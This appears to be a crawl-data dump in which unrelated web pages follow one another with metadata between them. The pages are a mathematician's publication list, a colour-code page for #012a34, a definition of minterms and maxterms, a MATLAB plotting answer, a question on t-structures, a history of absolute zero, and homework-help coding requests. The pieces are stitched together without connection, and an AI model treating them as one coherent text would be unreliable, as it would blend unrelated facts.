The boundary value problems of linear conjugation with displacement. Complex analysis and applications. Sofia, 1984, 375-382.\n34. On boundary value problems for nonlinear systems of differential equations on a plane (with W. Tutschke). (Russian) Soobshch. AN GSSR, 113(1984), No.1, 30-32.\n35. Some estimates of the norms of derivatives of holomorphic functions and their application to initial value problems (with W. Tutschke).(Russian) Z. Anal. Anwendungen 3(1984), No. 1, 1-5.\n36. On one differential boundary value problem of the theory of generalized analytic functions (with G. Akhalaia). Reports of Enlarged Seminar of I. Vekua Inst. of Appl. Math. I(1985), No.1.\n37. Boundary value problems of the theory of generalized analytic vectors with angular points. Functional differential equations and their applications. Theses of reports. Dagestan State Univ., Makhachkala, 1986, p.139.\n38. Differential boundary value problem for generalized analytic functions (with G. Akhalaia).(Russian) Trudy Inst. Prikl. Mat. TGU, 21(1987).\n39. Ilia Nesterovich Vekua (to the 80th Birthday Anniversary (with N. Bogoliubov, O. Oleinik, S. Sobolev, B. Khvedelidze).(Russian) Uspekhi Mat. Nauk, 42(1987), No 3.\n40. Boundary value problems of the theory of generalized analytic vectors for domains with angular points (with G. Akhalaia). All-Union Symposium \"Modern problems of mathematical physics\". Annotations of reports, Tbilisi, 1987, p.4.\n41. Differential boundary value problems for generalized analytic vectors (with Ngo Van Lyoc).All-Union Symposium \"Modern problems of mathematical physics\". Annotations of reports, Tbilisi, 1987, p.28.\n42. The problem V for generalized analytic vectors (with Ngo Van Lyoc). (Russian) Soobshch. AN GSSR, 128(1987), No. 2, 265-268.\n43. Differential boundary value problems for generalized analytic vectors. Modern problems of mathematical physics. Proc. of All-Union Symposium, Tbilisi State University, v. 2, 1987.\n44. Boundary value problems of the theory of generalized analytic vectors for domains with angular points (with G. Akhalaia). Modern problems of mathematical physics. Proc. of All-Union Symposium, Tbilisi State University, 1987, v. 2.\n45. To Green's identity for generalized analytic vectors (with G. Akhalaia). (Russian) Trudy IPM TGU, 28(1988).\n46. A survey of N.I. Muskhelishvili's scientific heritage. Continuum mechanics and related problems of analysis (with B. Khvedelidze) (Tbilisi, 1991). \"Metsniereba\", Tbilisi, 1993,\n47. Boundary value problems of the theory of generalized analytic vectors. Functional analytic methods in complex analysis and applications to partial differential equations (Trieste, 1993, 13-51). World Sci. Publishing, River Edge, NJ, 1995.\n48. Ilia Vekua's 90th birthday anniversary. International Symposium on Differential Equations and Mathematical Physics (with R.P. Gilbert, G.V. Jaiani) (Tbilisi, 1997). Memoirs on Differential Equations and Mathematical Physics, 12(1997), 1-10.\n49. On some problems for first order elliptic systems in the plane. Complex methods for partial differential equations (with Akhalaia). Ed. G.W.Begehr, A.O. Celebi and W. Tutschke. Kluwer Academic Publishers, 1999. 57-95.\n50. Boundary value problem with inclined derivative for second order elliptic system in the plane of complex variables (with Akhalaia). Complex Variables, 46(2001), 287-294." ]
[ null, "http://www.rmi.ge/person/manjavidze/mandj40.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.73165643,"math_prob":0.921313,"size":10236,"snap":"2019-35-2019-39","text_gpt3_token_len":2753,"char_repetition_ratio":0.1879398,"word_repetition_ratio":0.20027249,"special_character_ratio":0.26484954,"punctuation_ratio":0.21436004,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.97667557,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-26T03:16:35Z\",\"WARC-Record-ID\":\"<urn:uuid:8368fa16-fabd-43f3-9486-54d7c542cfd3>\",\"Content-Length\":\"13074\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:16de873c-e732-47ad-aa25-1968644d9a9f>\",\"WARC-Concurrent-To\":\"<urn:uuid:7644a5e9-26f6-4029-adef-464b07dc72dd>\",\"WARC-IP-Address\":\"109.205.45.234\",\"WARC-Target-URI\":\"http://www.rmi.ge/person/manjavidze/\",\"WARC-Payload-Digest\":\"sha1:6UVQ2ZOXBB34P6ERYWLSWHVV4D3FYHON\",\"WARC-Block-Digest\":\"sha1:V6EQKCEZHC3XL4VA6DXIPZDSGM6QGHCH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027330962.67_warc_CC-MAIN-20190826022215-20190826044215-00323.warc.gz\"}"}
https://www.colorhexa.com/012a34
[ "# #012a34 Color Information\n\nIn a RGB color space, hex #012a34 is composed of 0.4% red, 16.5% green and 20.4% blue. Whereas in a CMYK color space, it is composed of 98.1% cyan, 19.2% magenta, 0% yellow and 79.6% black. It has a hue angle of 191.8 degrees, a saturation of 96.2% and a lightness of 10.4%. #012a34 color hex could be obtained by blending #025468 with #000000. Closest websafe color is: #003333.\n\n• R 0\n• G 16\n• B 20\nRGB color chart\n• C 98\n• M 19\n• Y 0\n• K 80\nCMYK color chart\n\n#012a34 color description : Very dark cyan.\n\n# #012a34 Color Conversion\n\nThe hexadecimal color #012a34 has RGB values of R:1, G:42, B:52 and CMYK values of C:0.98, M:0.19, Y:0, K:0.8. Its decimal value is 76340.\n\nHex triplet RGB Decimal 012a34 `#012a34` 1, 42, 52 `rgb(1,42,52)` 0.4, 16.5, 20.4 `rgb(0.4%,16.5%,20.4%)` 98, 19, 0, 80 191.8°, 96.2, 10.4 `hsl(191.8,96.2%,10.4%)` 191.8°, 98.1, 20.4 003333 `#003333`\nCIE-LAB 15.009, -9.362, -10.372 1.46, 1.91, 3.54 0.211, 0.276, 1.91 15.009, 13.972, 227.929 15.009, -10.625, -9.032 13.821, -5.328, -5.513 00000001, 00101010, 00110100\n\n# Color Schemes with #012a34\n\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #340b01\n``#340b01` `rgb(52,11,1)``\nComplementary Color\n• #013425\n``#013425` `rgb(1,52,37)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #011134\n``#011134` `rgb(1,17,52)``\nAnalogous Color\n• #342501\n``#342501` `rgb(52,37,1)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #340111\n``#340111` `rgb(52,1,17)``\nSplit Complementary Color\n• #2a3401\n``#2a3401` `rgb(42,52,1)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #34012a\n``#34012a` `rgb(52,1,42)``\n• #01340b\n``#01340b` `rgb(1,52,11)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #34012a\n``#34012a` `rgb(52,1,42)``\n• #340b01\n``#340b01` `rgb(52,11,1)``\n• #000000\n``#000000` `rgb(0,0,0)``\n• #000202\n``#000202` `rgb(0,2,2)``\n• #01161b\n``#01161b` `rgb(1,22,27)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #013e4d\n``#013e4d` `rgb(1,62,77)``\n• #025266\n``#025266` `rgb(2,82,102)``\n• #02677f\n``#02677f` `rgb(2,103,127)``\nMonochromatic Color\n\n# Alternatives to #012a34\n\nBelow, you can see some colors close to #012a34. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #013431\n``#013431` `rgb(1,52,49)``\n• #013334\n``#013334` `rgb(1,51,52)``\n• #012e34\n``#012e34` `rgb(1,46,52)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #012634\n``#012634` `rgb(1,38,52)``\n• #012234\n``#012234` `rgb(1,34,52)``\n• #011d34\n``#011d34` `rgb(1,29,52)``\nSimilar Colors\n\n# #012a34 Preview\n\nThis text has a font color of #012a34.\n\n``<span style=\"color:#012a34;\">Text here</span>``\n#012a34 background color\n\nThis paragraph has a background color of #012a34.\n\n``<p style=\"background-color:#012a34;\">Content here</p>``\n#012a34 border color\n\nThis element has a border color of #012a34.\n\n``<div style=\"border:1px solid #012a34;\">Content here</div>``\nCSS codes\n``.text {color:#012a34;}``\n``.background {background-color:#012a34;}``\n``.border {border:1px solid #012a34;}``\n\n# Shades and Tints of #012a34\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #000b0e is the darkest color, while #f9feff is the lightest one.\n\n• #000b0e\n``#000b0e` `rgb(0,11,14)``\n• #011a21\n``#011a21` `rgb(1,26,33)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\n• #013a47\n``#013a47` `rgb(1,58,71)``\n• #02495a\n``#02495a` `rgb(2,73,90)``\n• #02596e\n``#02596e` `rgb(2,89,110)``\n• #026881\n``#026881` `rgb(2,104,129)``\n• #037894\n``#037894` `rgb(3,120,148)``\n• #0387a7\n``#0387a7` `rgb(3,135,167)``\n• #0497bb\n``#0497bb` `rgb(4,151,187)``\n• #04a6ce\n``#04a6ce` `rgb(4,166,206)``\n• #04b6e1\n``#04b6e1` `rgb(4,182,225)``\n• #05c5f4\n``#05c5f4` `rgb(5,197,244)``\n• #12cdfa\n``#12cdfa` `rgb(18,205,250)``\n• #26d1fb\n``#26d1fb` `rgb(38,209,251)``\n• #39d5fb\n``#39d5fb` `rgb(57,213,251)``\n• #4cd9fc\n``#4cd9fc` `rgb(76,217,252)``\n• #5fddfc\n``#5fddfc` `rgb(95,221,252)``\n• #73e1fc\n``#73e1fc` `rgb(115,225,252)``\n• #86e5fd\n``#86e5fd` `rgb(134,229,253)``\n• #99e9fd\n``#99e9fd` `rgb(153,233,253)``\n• #aceefd\n``#aceefd` `rgb(172,238,253)``\n• #c0f2fe\n``#c0f2fe` `rgb(192,242,254)``\n• #d3f6fe\n``#d3f6fe` `rgb(211,246,254)``\n• #e6faff\n``#e6faff` `rgb(230,250,255)``\n• #f9feff\n``#f9feff` `rgb(249,254,255)``\nTint Color Variation\n\n# Tones of #012a34\n\nA tone is produced by adding gray to any pure hue. In this case, #191b1c is the less saturated color, while #012a34 is the most saturated one.\n\n• #191b1c\n``#191b1c` `rgb(25,27,28)``\n• #171c1e\n``#171c1e` `rgb(23,28,30)``\n• #151e20\n``#151e20` `rgb(21,30,32)``\n• #131f22\n``#131f22` `rgb(19,31,34)``\n• #112024\n``#112024` `rgb(17,32,36)``\n• #0f2126\n``#0f2126` `rgb(15,33,38)``\n• #0d2328\n``#0d2328` `rgb(13,35,40)``\n• #0b242a\n``#0b242a` `rgb(11,36,42)``\n• #09252c\n``#09252c` `rgb(9,37,44)``\n• #07262e\n``#07262e` `rgb(7,38,46)``\n• #052830\n``#052830` `rgb(5,40,48)``\n• #032932\n``#032932` `rgb(3,41,50)``\n• #012a34\n``#012a34` `rgb(1,42,52)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #012a34 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
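The RGB and HSL figures quoted above can be reproduced with a few lines of Python. This is an illustrative sketch using the standard-library `colorsys` module; it is not part of the original page.

```python
import colorsys

def hex_to_rgb(hex_code):
    """Convert a hex triplet such as '012a34' to an (R, G, B) tuple of 0-255 integers."""
    return tuple(int(hex_code[i:i + 2], 16) for i in (0, 2, 4))

r, g, b = hex_to_rgb("012a34")
print(r, g, b)  # 1 42 52

# colorsys works on 0-1 fractions and returns (hue, lightness, saturation).
h, l, s = colorsys.rgb_to_hls(r / 255, g / 255, b / 255)
print(round(h * 360, 1), round(s * 100, 1), round(l * 100, 1))  # ~191.8, 96.2, 10.4
```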
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.52440715,"math_prob":0.7951825,"size":3654,"snap":"2020-24-2020-29","text_gpt3_token_len":1630,"char_repetition_ratio":0.12986301,"word_repetition_ratio":0.011090573,"special_character_ratio":0.5621237,"punctuation_ratio":0.23783186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9930111,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-06-01T16:23:18Z\",\"WARC-Record-ID\":\"<urn:uuid:e6cfa519-3672-4d1f-b412-1c5dcd2713d6>\",\"Content-Length\":\"36171\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:810fa515-e1f4-458f-bf63-a4bd96b7ffa1>\",\"WARC-Concurrent-To\":\"<urn:uuid:892ed9e2-2a6f-43ae-bc16-50af31ebf48b>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/012a34\",\"WARC-Payload-Digest\":\"sha1:A7EWH3SHGTRH5RHCAYD6NADKNFBBMBUG\",\"WARC-Block-Digest\":\"sha1:WRQJ3MKEFUXE46BB5EJMAIXAMWXYJYFG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347419056.73_warc_CC-MAIN-20200601145025-20200601175025-00011.warc.gz\"}"}
https://bookofproofs.github.io/branches/logic/literals-minterms-and-maxterms.html
[ "Before we learn more about particular types of types of canonical normal forms, we will introduce some auxiliary definitions and a lemma.\n\n# Definition: Literals, Minterms, and Maxterms\n\nLet $\\phi$ be a proposition with the Boolean variables $x_1,\\ldots,x_n.$ * Every occurence of $x_i$ and/or its negation $\\neg x_i$ in $\\phi$ is called a literal. We denote a literal by $(\\neg)x_i.$ * Every conjunction of literals $(\\neg)x_1\\wedge \\ldots \\wedge (\\neg)x_n$ is called a minterm. * Every disjunction of literals $(\\neg)x_1\\vee \\ldots \\vee (\\neg)x_n$ is called a maxterm.\n\nDefinitions: 1\nExamples: 2\nLemmas: 3 4\nProofs: 5 6\n\nGithub:", null, "### References\n\n#### Bibliography\n\n1. Mendelson Elliott: \"Theory and Problems of Boolean Algebra and Switching Circuits\", McGraw-Hill Book Company, 1982\n2. Hoffmann, Dirk: \"Theoretische Informatik, 3. Auflage\", Hanser, 2015" ]
[ null, "https://github.com/bookofproofs.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.71642184,"math_prob":0.99342066,"size":572,"snap":"2023-40-2023-50","text_gpt3_token_len":174,"char_repetition_ratio":0.13380282,"word_repetition_ratio":0.0,"special_character_ratio":0.28846154,"punctuation_ratio":0.11818182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9917895,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-26T23:38:35Z\",\"WARC-Record-ID\":\"<urn:uuid:1296d0a9-a1c7-4828-a6ce-fdc60dcea8b9>\",\"Content-Length\":\"9241\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:96067229-fb98-43ec-b881-7e5ad5c830bb>\",\"WARC-Concurrent-To\":\"<urn:uuid:1671c4e9-21f0-45ba-b756-24b76efe3ec5>\",\"WARC-IP-Address\":\"185.199.111.153\",\"WARC-Target-URI\":\"https://bookofproofs.github.io/branches/logic/literals-minterms-and-maxterms.html\",\"WARC-Payload-Digest\":\"sha1:UFESPPMNAYCEL34FWIUCVUJWEIAX3UJO\",\"WARC-Block-Digest\":\"sha1:ZA2FNTY3S3HRO746CGKJ6WSWY4RFTN2S\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510225.44_warc_CC-MAIN-20230926211344-20230927001344-00402.warc.gz\"}"}
https://au.mathworks.com/matlabcentral/answers/268987-plotting-a-mean-line-on-a-graph?s_tid=prof_contriblnk
[ "# Plotting a mean line on a graph\n\n198 views (last 30 days)\nOm on 19 Feb 2016\nAnswered: jgg on 19 Feb 2016\nHi everyone\nI currently have a graph that looks like this\nfigure plot(t,r(ix,:),'r'); hold on plot(t,r(~ix,:),'b'); xlabel('Time (ms)') ylabel('R (Y Axis)')\nIt is essentially a sine graph that tapers off.\nWhat I want to do is add a line where matlab will plot the mean,\nOne for the value x, one for the value ~x, and one overall.\n\njgg on 19 Feb 2016\n%set up\nx = 1:0.1:10;\nr = sin(x);\nt = 1:91;\nx = mod(t,2) == 0;\nm_x = mean(r(x));\nm_x2 = mean(-r(~x));\n% plotting\nfigure\nplot(t(x),r(x),'b')\nhold on\nplot(t(~x),-r(~x),'r')\nplot(t,ones(length(t),1)*m_x)\nplot(t,ones(length(t),1)*m_x2)\nYou can do it like this; the only operative part you need to do is:\nm_x = mean(r(x));\nplot(t,ones(length(t),1)*m_x)\nWhich in your code would like slightly different since you appear to have r as a matrix instead of a vector." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8422101,"math_prob":0.9985308,"size":1048,"snap":"2022-27-2022-33","text_gpt3_token_len":323,"char_repetition_ratio":0.10057471,"word_repetition_ratio":0.0,"special_character_ratio":0.33301526,"punctuation_ratio":0.1634981,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99995077,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-04T08:52:29Z\",\"WARC-Record-ID\":\"<urn:uuid:c7b174f5-0748-46c1-a52f-a95d97315cab>\",\"Content-Length\":\"110477\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:873492c7-dcee-4dc6-9bac-4300a5dd9cf7>\",\"WARC-Concurrent-To\":\"<urn:uuid:2134230e-5945-43ff-a692-e2564abc47c4>\",\"WARC-IP-Address\":\"104.68.243.15\",\"WARC-Target-URI\":\"https://au.mathworks.com/matlabcentral/answers/268987-plotting-a-mean-line-on-a-graph?s_tid=prof_contriblnk\",\"WARC-Payload-Digest\":\"sha1:66T3AKKIDYSCFISGN22MT37TUP5AJIGT\",\"WARC-Block-Digest\":\"sha1:FZOHC6GUESXGRJJV7U7CBYV5G5IF26R2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104364750.74_warc_CC-MAIN-20220704080332-20220704110332-00336.warc.gz\"}"}
https://math.stackexchange.com/questions/2450291/transferring-t-structures-via-adjoint-functors
[ "# Transferring $t$-structures via adjoint functors\n\nIn Gaitsgory and Rozenblyum's Derived Algebraic Geometry book, they frequently use the following technique to transfer a $t$-structure from one category to another (for example, 1.5 in this paper or page 58 of this paper). The claim is (I think -- maybe some hidden assumptions?):\n\nLet $F: C \\rightarrow D$ be an exact functor which is a left adjoint, and suppose $D$ has a $t$-structure. Then, we define $C^{\\leq 0}$ to be the full subcategory whose objects satisfy $F(X) \\in D^{\\leq 0}$. We define $C^{\\geq 1}$ to be the right orthogonal to $C^{\\leq 0}$. This defines a $t$-structure.\n\nFor example, in the first link, a proposition in Lurie's Higher Algebra is referenced. But this proposition assumes that the functor in question is a localization functor, which is exactly what I'm not sure about.\n\nHere's an attempt. Let $Y \\in C$. Then, there is an exact triangle $X \\rightarrow FY \\rightarrow Z$ where $X \\in D^{\\leq 0}$ and $Z \\in D^{\\geq 1}$. We have a map $Y \\rightarrow GZ$ where $G$ is the right adjoint -- one can check that the right adjoint takes $D^{\\geq 1}$ to $C^{\\geq 1}$. The claim is that the fiber (i.e. cocone) of $Y \\rightarrow GZ$ is in $C^{\\leq 0}$.\n\nNow, the only way to check this is to apply $F$. Since $F$ is exact, we have $$F(cocone) \\rightarrow FX \\rightarrow FGZ$$ However, it's not clear that the cocone of $FX \\rightarrow FGZ$ is in $D^{\\leq 0}$ to me." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88566643,"math_prob":0.999345,"size":1384,"snap":"2021-43-2021-49","text_gpt3_token_len":425,"char_repetition_ratio":0.13043478,"word_repetition_ratio":0.0,"special_character_ratio":0.29696533,"punctuation_ratio":0.10726643,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999677,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-17T16:51:42Z\",\"WARC-Record-ID\":\"<urn:uuid:a944c3b9-d90c-43af-8caa-381e6fefce61>\",\"Content-Length\":\"161026\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bcf537f5-06da-4a31-b4e6-85eddd6bc557>\",\"WARC-Concurrent-To\":\"<urn:uuid:e244334b-7af5-48dd-a420-8b4446889cd4>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/2450291/transferring-t-structures-via-adjoint-functors\",\"WARC-Payload-Digest\":\"sha1:XPL6KN2D3DPM4JC2UC2C6GDMJ7K62CUZ\",\"WARC-Block-Digest\":\"sha1:MVXYUMK4KEN5TE2E5XHO35XMLJ4UGKG7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585178.60_warc_CC-MAIN-20211017144318-20211017174318-00562.warc.gz\"}"}
http://humanthermodynamics.wikifoundry.com/page/absolute+zero
[ "# Absolute zero", null, "At absolute zero (0 K or -273 ˚C), according to the kinetic theory of heat, particle movement should stop.\nIn physics, absolute zero refers to a zero indicator reading on an absolute temperature scale.\n\nHistory\nIn 1703, Guillaume Amontons, a French physicist, mathematically derived the idea of an “absolute zero”. \n\n“It appears that the ‘extreme cold’ [absolute zero] of this thermometer is that which would reduce the air by its ‘spring’, to sustain no load at all.”\n— Guillaume Amontons (1703), Publication \n\nIn c.1780, William Irvine, based on the theories of Joseph Black, supposedly, calculated absolute zero; the following is a synopsis:\n\n“Irvine’s particular theory was basically very simple in that the took the concept of ‘quantity of heat’ to its logical conclusion. Each and every body, according to Irving, contains a certain ‘absolute quantity of heat’, which is fixed by its heat capacity and its absolute temperature. If, for any reason, the heat capacity of a body should change then it must either emit or absorb heat; thus, the heats of combustion, of chemical reactions in general and the latent heats of fusion and vaporization are merely the consequences of abrupt changes in the heat capacities of the substances concerned. In fact, all productions or absorptions of heat indicate changes in heat capacity. Now this theorem enabled Irvine and his followers to calculate the absolute zero of temperature.”\nDonald Cardwell (1971), From Watt to Clausius (pg. 55)\n\nIn 1848, Scottish physicist William Thomson publishes his “On an Absolute Thermometric Scale founded on Carnot’s Theory of the Motive Power of Heat, and Calculated from Regnault’s Observations”, in which he bases the concept of thermodynamics-based “absolute thermometric scale” on the 1824 formula for heat engine efficiency of French physicist Sadi Carnot. \n\nIn 1925, Albert Einstein and Satyenda Bose predicted a new state of matter at ultra-low temperatures.\n\nIn 1995, Einstein and Bose's \"new state of matter\", called Bose-Einstein condensate, is created at 1.7E-7 K by Americans Eric Cornell and Carl Wieman at Colorado University, Boulder.\n\nEntropy at absolute zero\nIn 1905, German physicist Walther Nernst introduced his heat theorem, later coming to be known as the third law of thermodynamics, which showed that absolute zero is unattainable. The essential problem Nernst tackled is that the state function formulation of heat Q called ‘equivalence-value’ (renamed 'entropy' in 1865), introduced formulaically by German physicist Rudolf Clausius in 1854 as:", null, "$\\frac{Q}{T}$", null, "The division by zero problem: as x approaches 0 from the right, in the function y = 1/x, the value of y approaches infinity. As x approaches 0 from the left, y approaches minus infinity. On this logic, in the function S = Q/T, s approaches infinity as T approaches 0, for both positive or negative values of heat flow.\n\nverbally defined as the \"generation of the quantity of heat Q of the temperature T from work\" becomes an infinite or undefined when the temperature becomes zero:", null, "$\\frac{Q}{0} \\,$\n\nwhich thus leads to an unexplained inconsistency in the second law of thermodynamics at absolute zero. In other words, the possibility that there exists an actual state in nature of zero degrees temperature introduces the \"division by zero\" issue of mathematical functions. 
In an alternative sense, both heat flow and temperature could simultaneously reach zero at absolute zero, giving the function S = 0/0, another non-computable result.\n\nReferences\n1. Shachtman, Tom. (1999). Absolute Zero and the Conquest of Cold (absolute zero: historical timeline, pgs. ix-x). Mariner Books.\n2. Thomson, William. (1848). “On an Absolute Thermometric Scale Founded on Carnot’s Theory of the Motive Power of Heat” (pgs. 100-06), Cambridge Philosophical Society Proceedings for June 5; and Phil. Mag., Oct. 1848.\n3. Division by zero – Wikipedia.\n4. James, W.S. (1929). “The Discovery of the Gas Laws. II. Gay-Lussac’s Law” (abs), Science Progress in the Twentieth Century (1919-1933), 24(93):57-71." ]
[ null, "https://wikifoundryimages.s3.amazonaws.com/X71iNL2SZEGMA_DpPtpwFg11436", null, "https://wikifoundryimages.s3.amazonaws.com/PqsWEdCt1yFqWKlRqC_3PQ346 ", null, "https://wikifoundryimages.s3.amazonaws.com/7NNoZcwusVvSj3z8VQlz5Q20018", null, "https://wikifoundryimages.s3.amazonaws.com/w_cS74WPHBURCCGVaOdfrA328 ", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8914967,"math_prob":0.84662086,"size":4027,"snap":"2022-27-2022-33","text_gpt3_token_len":926,"char_repetition_ratio":0.122793935,"word_repetition_ratio":0.01904762,"special_character_ratio":0.234666,"punctuation_ratio":0.13907285,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97999823,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,2,null,4,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-13T09:54:12Z\",\"WARC-Record-ID\":\"<urn:uuid:794a4ae5-0f9c-46bd-9dd1-9503910ff1dc>\",\"Content-Length\":\"16358\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1b29f990-127d-4844-93a3-a5423d0ec5b4>\",\"WARC-Concurrent-To\":\"<urn:uuid:bea43fac-c0c6-445d-957a-70df0ef1093a>\",\"WARC-IP-Address\":\"52.70.238.32\",\"WARC-Target-URI\":\"http://humanthermodynamics.wikifoundry.com/page/absolute+zero\",\"WARC-Payload-Digest\":\"sha1:RKZQ3UXD72S2CTCOZFLPOWVWT5WO7O7J\",\"WARC-Block-Digest\":\"sha1:3BH2XYOPZOCXCPAHB7BZZ4CJ3Y7I53RU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882571911.5_warc_CC-MAIN-20220813081639-20220813111639-00474.warc.gz\"}"}
https://allessays.online/design-and-write-an-object-oriented-program-in-c-that-meets-the/
[ "Get help from the best in academic writing.\n\n# Design and write an Object Oriented program in C that meets the\n\nQuestion Design and write an Object Oriented program in C that meets the requirements shown below. provide a suitable menu with an exit option in your main program. (DATA SAMPLE IS IN ATTACHED IMAGE BELOW:-)create date class, time class and vector class.The first field contains both the date and time. You will need to split the date and time values. create date class so, date can be stored in the Date class. You need to create Time class to store time values.Vector.h contains the following: #ifndef VECTOR_H#define VECTOR_H// The class declaration must have doxygen comments – put these intemplate\n\n## We are using Python. DO NOT USE CONTINUE, BREAK,\n\nQuestion\n\nWe are using Python. DO NOT USE CONTINUE, BREAK, OR SORTED(). also DO NOT IMPORT ANYTHING ELSE. This is the question. I have my own code and plan to submit my own code, but I can’t figure out how to get past the point i am stuck on. Again, even a nudge in the correct direction would be helpful. from typing import List, Tuple, Dict, TextIO def recommend_clubs( person_to_friends: Dict[str, List[str]], person_to_clubs: Dict[str, List[str]], person: str,) –\n\n## This is from Statistics and Probability, Jupyter Project 2 written\n\nQuestion This is from Statistics and Probability, Jupyter Project 2 written in python. Having trouble with the coding for step 4.. Step 3: Hypothesis Test for the Population Mean (I)A relative skill level of 1420 represents a critically low skill level in the league. The management of your team has hypothesized that the average relative skill level of your team in the years 2013-2015 is greater than 1420. Test this claim using a 5% level of significance. For this test, assume that the population standard deviation for relative skill level is unknown. Make the following edits to the code block below: -Replace jQuery22407530793663682149_1575394441358DATAFRAME_YOUR_TEAMjQuery22404996412957777534_1575394519195 with the name of your team’s dataframe. See Step 2 for the name of your team’s dataframe. -Replace ??RELATIVE_SKILL?? with the name of the variable for relative skill. See the table included in the Project Two instructions above to pick the variable name. Enclose this variable in single quotes. For example, if the variable name is var2 then replace ??RELATIVE_SKILL?? with ‘var2’. -Replace ??NULL_HYPOTHESIS_VALUE?? with the mean value of the relative skill under the null hypothesis.After you are done with your edits, click the block of code below and hit the Run button above.In :import scipy.stats as st ​ # Mean relative skill level of your team mean_elo_your_team = your_team_df[‘elo_n’].mean() print(“Mean Relative Skill of your team in the years 2013 to 2015 =”, round(mean_elo_your_team,2)) ​ ​ # Hypothesis Test # —- TODO: make your edits here —- test_statistic, p_value = st.ttest_1samp(your_team_df[‘elo_n’], 1420) ​ print(“Hypothesis Test for the Population Mean”) print(“Test Statistic =”, round(test_statistic,2)) print(“P-value =”, round(p_value,4)) Output: Mean Relative Skill of your team in the years 2013 to 2015 = 1440.49 Hypothesis Test for the Population Mean Test Statistic = 4.04 P-value = 0.0001 Step 4: Hypothesis Test for the Population Mean (II)A team averaging 110 points is likely to do very well during the regular season. The coach of your team has hypothesized that your team scored at an average of less than 110 points in the years 2013-2015. 
